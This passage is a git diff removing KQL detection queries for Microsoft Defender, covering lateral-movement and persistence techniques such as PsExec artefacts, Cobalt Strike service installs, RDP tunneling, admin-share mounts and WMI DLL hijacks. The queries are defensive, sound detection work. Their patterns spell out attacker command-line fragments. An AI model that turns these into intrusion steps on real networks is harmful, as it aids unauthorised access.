ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe" \ No newline at end of file diff --git a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql b/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql deleted file mode 100644 index 67f96f11..00000000 --- a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -DeviceFileEvents -| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql deleted file mode 100644 index 9edcca22..00000000 --- a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/22 -// Level: medium -// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines -// Tags: attack.execution, attack.lateral_movement, attack.t1072 -DeviceProcessEvents -| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe" \ No newline at end of file diff --git a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql b/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql deleted file mode 100644 index 986261d9..00000000 --- a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/12 -// Level: medium -// Description: Detects port forwarding activity via SSH.exe -// Tags: attack.command_and_control, attack.lateral_movement, attack.t1572, attack.t1021.001, attack.t1021.004 -DeviceProcessEvents -| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R ") and FolderPath endswith "\\ssh.exe" \ No newline at end of file diff --git a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql deleted file mode 100644 index e448ad48..00000000 --- a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Wojciech Lesicki -// Date: 2021/06/29 -// Level: high -// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. - -// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 -DeviceRegistryEvents -| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services")) \ No newline at end of file diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql deleted file mode 100644 index ce7ee51b..00000000 --- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga -// Date: 2020/10/12 -// Level: critical -// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network -// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003 -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll" \ No newline at end of file diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql deleted file mode 100644 index 0f172583..00000000 --- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga -// Date: 2020/10/12 -// Level: critical -// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class -// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003 -DeviceImageLoadEvents -| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe" \ No newline at end of file diff --git a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql b/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql deleted file mode 100644 index 5103ee52..00000000 --- a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Aaron Stratton -// Date: 2023/11/13 -// Level: high -// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. - -// Tags: attack.t1021.003, attack.lateral_movement -DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql b/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql deleted file mode 100644 index b4c31b54..00000000 --- a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/01/24 -// Level: high -// Description: Detects RDP session hijacking by using MSTSC shadowing -// Tags: attack.lateral_movement, attack.t1563.002 -DeviceProcessEvents -| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:" \ No newline at end of file diff --git a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql deleted file mode 100644 index ff92bcaa..00000000 --- a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tom Ueltschi (@c_APT_ure) -// Date: 2019/01/12 -// Level: medium -// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors -// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement -DeviceRegistryEvents -| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql b/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql deleted file mode 100644 index dd48e1e7..00000000 --- a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/27 -// Level: medium -// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. -// Tags: attack.lateral_movement, attack.t1021 -DeviceProcessEvents -| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ") \ No newline at end of file diff --git a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql deleted file mode 100644 index 6cbd83b0..00000000 --- a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport -// Date: 2022/02/12 -// Level: high -// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values -// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112 -DeviceProcessEvents -| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections")) \ No newline at end of file diff --git a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql b/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql deleted file mode 100644 index a8265a7e..00000000 --- a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/27 -// Level: high -// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. -// Tags: attack.lateral_movement, attack.t1021 -DeviceProcessEvents -| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) \ No newline at end of file diff --git a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql b/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql deleted file mode 100644 index 9f1c5485..00000000 --- a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Samir Bousseaden -// Date: 2019/02/16 -// Level: high -// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 -// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001, car.2013-07-002 -DeviceNetworkEvents -| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389) \ No newline at end of file diff --git a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql deleted file mode 100644 index 85c02aac..00000000 --- a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community -// Date: 2019/01/29 -// Level: high -// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule -// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090 -DeviceProcessEvents -| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql b/Lateral Movement/Rundll32_Execution_Without_Parameters.kql deleted file mode 100644 index 6fb33be4..00000000 --- a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz, Relativity -// Date: 2021/01/31 -// Level: high -// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module -// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 -DeviceProcessEvents -| where ProcessCommandLine in~ ("rundll32.exe", "rundll32") \ No newline at end of file diff --git a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql b/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql deleted file mode 100644 index 05e8ca0b..00000000 --- a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/01/19 -// Level: high -// Description: Detects suspicious Plink tunnel port forwarding to a local port -// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001 -DeviceProcessEvents -| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client" \ No newline at end of file diff --git a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql b/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql deleted file mode 100644 index 781539c1..00000000 --- a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/03/17 -// Level: high -// Description: Detects a suspicious RDP session redirect using tscon.exe -// Tags: attack.lateral_movement, attack.t1563.002, attack.t1021.001, car.2013-07-002 -DeviceProcessEvents -| where ProcessCommandLine contains " /dest:rdp-tcp#" \ No newline at end of file diff --git a/Lateral Movement/Suspicious_SysAidServer_Child.kql b/Lateral Movement/Suspicious_SysAidServer_Child.kql deleted file mode 100644 index e0e0d33e..00000000 --- a/Lateral Movement/Suspicious_SysAidServer_Child.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/26 -// Level: medium -// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) -// Tags: attack.lateral_movement, attack.t1210 -DeviceProcessEvents -| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe") \ No newline at end of file diff --git a/Lateral Movement/Suspicious_UltraVNC_Execution.kql b/Lateral Movement/Suspicious_UltraVNC_Execution.kql deleted file mode 100644 index e5a222c2..00000000 --- a/Lateral Movement/Suspicious_UltraVNC_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2022/03/04 -// Level: high -// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) -// Tags: attack.lateral_movement, attack.g0047, attack.t1021.005 -DeviceProcessEvents -| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:" \ No newline at end of file diff --git a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql b/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql deleted file mode 100644 index 11e20190..00000000 --- a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/06/24 -// Level: medium -// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. -// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003 -DeviceImageLoadEvents -| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/Lateral Movement/Terminal_Service_Process_Spawn.kql b/Lateral Movement/Terminal_Service_Process_Spawn.kql deleted file mode 100644 index 0e46fcfe..00000000 --- a/Lateral Movement/Terminal_Service_Process_Spawn.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/05/22 -// Level: high -// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) -// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002 -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath)))) \ No newline at end of file diff --git a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql b/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql deleted file mode 100644 index 959bf177..00000000 --- a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Ilyas Ochkov, oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. - -// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003 -DeviceNetworkEvents -| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe"))) \ No newline at end of file diff --git a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql b/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql deleted file mode 100644 index b8bb4681..00000000 --- a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/12/06 -// Level: high -// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". -// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql deleted file mode 100644 index 3f40bc3a..00000000 --- a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/09/02 -// Level: medium -// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003 -DeviceImageLoadEvents -| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql deleted file mode 100644 index 38313837..00000000 --- a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga -// Date: 2020/10/05 -// Level: medium -// Description: Detects when an admin share is mounted using net.exe -// Tags: attack.lateral_movement, attack.t1021.002 -DeviceProcessEvents -| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql deleted file mode 100644 index d5e9627d..00000000 --- a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/21 -// Level: high -// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility -// Tags: attack.lateral_movement, attack.t1021.002 -DeviceProcessEvents -| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql deleted file mode 100644 index a8ed798d..00000000 --- a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/02 -// Level: low -// Description: Detects when a share is mounted using the "net.exe" utility -// Tags: attack.lateral_movement, attack.t1021.002 -DeviceProcessEvents -| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Lateral Movement/Wmiexec_Default_Output_File.kql b/Lateral Movement/Wmiexec_Default_Output_File.kql deleted file mode 100644 index e9f42bee..00000000 --- a/Lateral Movement/Wmiexec_Default_Output_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/02 -// Level: critical -// Description: Detects the creation of the default output filename used by the wmiexec tool -// Tags: attack.lateral_movement, attack.t1047 -DeviceFileEvents -| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$" \ No newline at end of file diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql deleted file mode 100644 index 631d57e9..00000000 --- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: high -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe" \ No newline at end of file diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql deleted file mode 100644 index 60ed5e82..00000000 --- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: critical -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002 -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll" \ No newline at end of file diff --git a/Lateral Movement/Writing_Local_Admin_Share.kql b/Lateral Movement/Writing_Local_Admin_Share.kql deleted file mode 100644 index 0c4f5452..00000000 --- a/Lateral Movement/Writing_Local_Admin_Share.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: medium -// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB). -This technique is used by post-exploitation frameworks. - -// Tags: attack.lateral_movement, attack.t1546.002 -DeviceFileEvents -| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\" \ No newline at end of file diff --git a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql deleted file mode 100644 index 857eb759..00000000 --- a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/17 -// Level: high -// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD") \ No newline at end of file diff --git a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql deleted file mode 100644 index df2ed998..00000000 --- a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker adds a 